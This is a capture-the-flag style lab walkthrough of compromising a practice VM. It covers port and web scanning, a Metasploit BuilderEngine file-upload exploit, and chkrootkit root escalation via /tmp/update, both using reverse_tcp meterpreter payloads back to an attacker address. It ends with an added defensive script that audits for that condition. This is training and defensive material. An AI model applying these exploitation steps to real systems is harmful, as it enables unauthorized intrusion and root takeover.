# Lab setup
Download the target VM, import it directly, and set the network adapter to NAT mode.
IP: 192.168.1.131
# Initial information gathering
Open ports:
```text
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy
46322/tcp open unknown
```
Directory enumeration:
```text
[02:38:38] 301 - 314B - /blocks -> http://192.168.1.131/blocks/
[02:38:41] 200 - 392B - /codeception.yml
[02:38:50] 301 - 313B - /files -> http://192.168.1.131/files/
[02:38:50] 200 - 522B - /files/
[02:38:59] 200 - 706B - /license.txt
[02:39:05] 301 - 315B - /modules -> http://192.168.1.131/modules/
[02:39:05] 200 - 538B - /modules/
[02:39:18] 200 - 36B - /robots.txt
[02:39:19] 403 - 293B - /server-status
[02:39:19] 403 - 294B - /server-status/
[02:39:26] 301 - 314B - /system -> http://192.168.1.131/system/
[02:39:26] 200 - 120B - /system/
[02:39:27] 301 - 314B - /themes -> http://192.168.1.131/themes/
[02:39:27] 200 - 503B - /themes/
```
```text
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 65, size: 53fb059bb5bc8, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /system/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /license.txt: License file found may identify site software.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
```
Detailed service identification:
```text
PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
46322/tcp open  status      1 (RPC #100024)
```
From the contents of the themes directory, the site's theme is identified as Default 2015 Theme for BuilderEngine V3.
Searching metasploit for this theme turns up a known vulnerability, so we use it directly.
# Exploitation
# Getting a shell via BuilderEngine
Use the metasploit module to obtain a shell:
```text
msf6 exploit(multi/http/builderengine_upload_exec) > show options

Module options (exploit/multi/http/builderengine_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.131    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to BuilderEngine
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   BuilderEngine 3.5.0

View the full module info with the info, or info -d command.
```
# Privilege escalation
Listing the running processes shows chkrootkit. We escalate privileges with the corresponding metasploit module:
```text
msf6 exploit(unix/local/chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION     1                     yes       The session to run this module on

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.
```
After `run`, wait for the reverse shell to connect back.
# Summary
The principle behind the chkrootkit exploit is explained here: https://www.exploit-db.com/exploits/33899
chkrootkit executes /tmp/update on each scheduled run; commands written to that file run with the privileges of the user running chkrootkit, which gives root directly.
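The following shell script is an added defensive check written for this page; it is not part of the original write-up, of chkrootkit, or of the Metasploit module. It audits a host for the condition the privilege-escalation section and the summary describe: a file named `update` in the temp directory that a scheduled chkrootkit run would execute with its own (usually root, via cron) privileges. The directory argument, the function names and the cron locations searched are assumptions made for the example.

```sh
#!/bin/sh
# Added defensive audit, not part of the original write-up.
# chkrootkit executes "<tmpdir>/update" when it runs, with the privileges of
# whoever invoked it, which is root when it is started from cron. This script
# reports whether such a file exists and who could have planted it.
# The directory argument is an assumption so the check can be pointed at a
# test directory instead of the real /tmp.

# audit_tmp_update DIR
# Returns 0 when DIR/update is absent, 1 when it exists (and prints details).
audit_tmp_update() {
    dir="${1:-/tmp}"
    f="$dir/update"
    if [ ! -e "$f" ]; then
        echo "OK: no $f present"
        return 0
    fi
    echo "ALERT: $f exists; a scheduled chkrootkit run would execute it"
    ls -l "$f"
    # A file here that is not owned by root was planted by an unprivileged
    # user; a world-writable one could be modified by any local account.
    owner=$(ls -ld "$f" | awk '{print $3}')
    if [ "$owner" != "root" ]; then
        echo "  owner '$owner' is not root: treat as attacker-controlled"
    fi
    # Show the first lines so a responder can see what would have run.
    echo "  first lines:"
    head -n 5 "$f" | sed 's/^/    | /'
    return 1
}

# cron_runs_chkrootkit
# Lists scheduled jobs that mention chkrootkit; a root-owned job is what turns
# the planted file into code execution as root. Paths are assumptions.
cron_runs_chkrootkit() {
    echo "Scheduled jobs mentioning chkrootkit:"
    grep -rls chkrootkit /etc/cron.daily /etc/cron.d /etc/crontab 2>/dev/null \
        || echo "  (none found)"
}

# Run the audit only when a directory is given, e.g. `sh chkrootkit_audit.sh /tmp`.
if [ -n "${1:-}" ]; then
    cron_runs_chkrootkit
    audit_tmp_update "$1"
fi
```

Run it as `sh chkrootkit_audit.sh /tmp` on a host where chkrootkit is scheduled. A non-zero exit status means the file exists; preserve it (ownership, timestamps, contents) for the incident record before removing it, and check the cron listing to see which account the scheduled run uses.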